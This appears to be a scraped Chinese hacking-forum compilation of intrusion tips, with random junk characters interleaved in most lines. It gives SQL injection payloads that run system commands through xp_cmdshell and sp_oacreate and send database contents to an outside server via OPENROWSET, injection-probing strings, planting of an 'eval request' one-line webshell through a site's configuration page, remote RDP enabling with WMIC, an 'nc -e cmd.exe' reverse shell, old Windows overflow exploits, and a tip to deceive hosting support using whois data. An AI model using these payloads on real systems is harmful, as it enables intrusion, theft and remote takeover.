SA点数据库分离技术相关# a0 x/ H$ b8 |4 K8 o& Z9 ~! I2 t
4 V, L& f. j8 a( s# ?. z
; ?6 i0 [7 I8 N4 A+ kSA点数据库分离搞法+语句:5 }& \: `7 \: L9 J) g& z
6 D. ~6 U4 O' }* k
注射点不显错,执行下面三条语句页面都返回正常。5 t- b# c5 y/ q! ^. x; a" U
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')# Y2 P5 q* w2 p' l
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')" Y( F7 R. f" c( e& A
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')1 c& g+ k, b% d) n. e
可以列目录,判断系统为2000,web与数据库分离
0 |6 F9 Q6 l) |; @$ X O$ l' r遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。/ K3 y3 B. K+ q& g9 S
在注射点上执行$ G; Y* m( l M6 f' k
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--- M9 U( L" ?2 d0 M
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
5 \5 J$ C( j% A3 T3 g$ Z还有我用NC监听得其他端口都没有得到IP。
0 Z ~) r/ G+ _& k; C8 U3 i
* V1 d( x! `: a y2 o F `$ ]通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。$ {9 G1 E. N- U
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
7 B, o, x+ y; F5 Q1 h4 G3 O3 Y$ J9 C2 a2 J" T S& L
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--* R5 X* C" ]7 F# X& M# F
7 Q* [$ L3 `9 C" Q+ N, _
现在就猜想是不是数据库是内网而且不能连外网。
( Q3 t1 x: F: U6 o8 z& p0 s9 ]/ S0 n
6 S/ Q3 Z6 _- K% D: |2 L% L: r
access导出txt文本代码
; {5 S; ?& T* bSELECT * into [test.txt] in 'd:\web\' 'text;' from admin4 d$ p$ M* b" H6 R
# q8 M& R( R2 O8 w* \
+ t4 u; y1 F7 [$ y6 m3 S d, P8 r( O0 K$ T
自动跳转到指定网站代码头7 D$ t; l( x9 o% ~8 ?
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>1 C( X, K1 ]+ ~( m% l. P
; I' \# M9 O+ l% y
1 W) C4 c, M/ z% M+ g8 b( C$ l' d
入侵java or jsp站点时默认配置文件路径:
% s$ h3 |8 r+ |% X\web-inf\web.xml. @: J! X1 G5 E# J2 d
tomcat下的配置文件位置:& R& j: n& L _4 G! v
\conf\server.xml (前面加上tomcat路径)3 ~) T" s9 G7 f8 |2 g: A
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
& d; w$ {7 p# o7 | U) U( A9 \' @2 J7 O% z, X4 y
' S: y& G) K4 v' o
5 u) h& x7 M3 l6 r0 z! _$ s
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:. e: I# S1 U! j
-1%23& t k( k! ]2 c: v0 F& i3 e2 W
> , q& Y1 n7 O' q4 h- ], K
<4 P/ a6 A( Y% W9 o
1'+or+'1'='1
& P6 _( z" \& i9 ]2 E7 V) gid=8%bf
4 w+ i2 U. o5 I
$ I, @+ i: C: q* F8 L a2 e全新注入点检测试法:9 B% W9 ^7 Q5 {5 d. w: J
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
9 Q- L( |$ i$ I8 W+ T( W8 E0 S7 k; {' P: K" g& u9 G2 J
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
# ~5 E2 e# |( k5 I- q1 g
! W5 E0 l9 [' q A搜索型注入判断方法:; U- Q& m9 ?$ ^# E
北京%' and '1'='1' and '%'='
( `2 {' d& f3 C* d) j+ n k& d. A北京%' and '1'='2' and '%'=', i; V, f8 C% d9 N
1 X. ~+ M6 ?; j. D
# W, c( ~/ ^' m5 DCOOKIES注入:
% x9 b9 ^; m$ X
/ D! \: ~- u$ {( hjavascript:alert(document.cookie="id="+escape("51 and 1=1"));. H, x8 A5 N8 v
% g* u4 K0 }/ n, H2000专业版查看本地登录用户命令:
X: g/ R. V4 p2 P# E8 rnet config workstation2 r5 z% R* q q; s4 q
0 S: }- z6 E) G) n: C
+ F6 { a: w' ^2003下查看ipsec配置和默认防火墙配置命令:
2 H2 p* H& p& q" ?; T* znetsh firewall show config1 W5 G% I! d T& o6 M6 p+ u3 S; E
netsh ipsec static show all" ]) ]3 Y5 u% x/ P. V4 m
; b6 d0 Y: F% X2 `1 R
不指派指定策略命令:
$ l. ~7 m7 m; I+ bnetsh ipsec static set policy name=test assign=n (test是不指派的策略名)
- d2 r6 ~1 N) Rnetsh ipsec static show policy all 显示策略名7 {1 L1 \) @$ z* \% c
) Q K! ~8 \* U' B. N2 i9 u* t9 I3 m
; B6 r+ U5 o1 E4 N( O
猜管理员后台小技巧:( _! l% ]1 x" y: T \
admin/left.asp l2 t) }' F& Q, i2 t3 r* E
admin/main.asp; ~) C% |" Y1 W" \/ K& s$ o
admin/top.asp
' c" Y9 {0 \6 R) ?* zadmin/admin.asp
+ Q; j" l) W& t会现出菜单导航,然后迅雷下载全部链接4 u. E" ^+ c, |
: H5 ~# _6 m+ W6 j$ W& x# g
) n& p" e5 G9 G& O3 a" r社会工程学:
2 W# e: c' h( {用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
2 ~0 [! ?2 o! D. d" A6 ]# T然后去骗客服
8 P R: D3 ~7 _: f4 B7 o/ Z; i
1 G+ c0 P7 N c0 d( O8 Q. B1 _6 `* K5 Q( Q: W4 |
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
6 ^& T+ s [# q6 v2 Z: d查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, . F, y0 q# q# `! U" u
存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
6 G1 s, N% u Q+ h/ t) S% K- X/ @- Z2 Z1 k9 v P
1 R; t Q* W- Y8 |& k- D+ C# h" @8 k" b+ e! ?
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
! Z+ J6 k3 E* r. V* P) u8 l4 a0 l& X( R/ C
: D9 O6 \( H; ]3 ?) Z5 L
& `5 l) ?8 K$ M% ~CMD加密注册表位置
# ], s, X! h8 x(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor6 A7 I' u9 c$ v
AutoRun
. M& b S4 x1 u* R0 G) l+ ` |! I; o$ Y" X5 k! e) ^
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor# S* |% Y3 S! o" `
AutoRun
0 h" M) O* {5 M1 ]4 @- o; v
2 Q' c( I3 m: k& ]
- b$ y( D7 l. }" p) A1 v+ @在找注入时搜索Hidden,把他改成test
" x X" P; l1 Z9 o# A; t7 w" f
! G1 R, ?" t# S, |; C
0 z8 [# S$ C) }- l5 Emstsc /v:IP /console 3 N+ S8 D }2 E
% d$ G/ N' s, j( _
, {: w9 ^9 m0 Q
一句话开3389:" \: L' z' L6 }+ i2 E3 S: W* y
/ }- P) t$ h D" ` e5 E$ q0 p
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH> 4 C2 b5 ?3 c m! G8 O; a1 J$ w i
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
; }/ z0 R9 B f8 l2 a5 l$ p: \
5 ?) Z3 y, ?6 y+ u. g6 G [; Y: b* l! e+ g+ j$ L) O
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:7 p5 U8 G" G0 L1 R* {8 _
Insert into admin(user,pwd) values('test','test')
: B, T4 }" Q! J9 L4 A, t/ |; }4 {
; k2 O& f B8 F# ^0 V( W/ `8 E! l* [! ~1 g
NC反弹: c& {& {9 z+ V9 d7 ~; N
先在本机执行: nc -vv -lp 监听的端口 (自己执行) $ o: ?8 D; L- j) Z9 d
然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
1 y* q7 g7 R: u* n# `* U) L8 ]. @0 V* _
4 x9 P7 a5 J. A6 h在脚本入侵过程中要经常常试用%00来确认下参数是否有问题. X2 ~2 C) j, M* g
f2 n' b, |9 K8 o) X5 Y# S
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
: i9 g/ M* q Y* n- T M9 N3 Z' r例如:# |& a ^1 ~. P; L" \/ T: _! L+ d
subst k: d:\www\ 用d盘www目录替代k盘
2 h' e4 k7 K8 q5 m5 M% m7 Usubst k: /d 解除K盘代替 |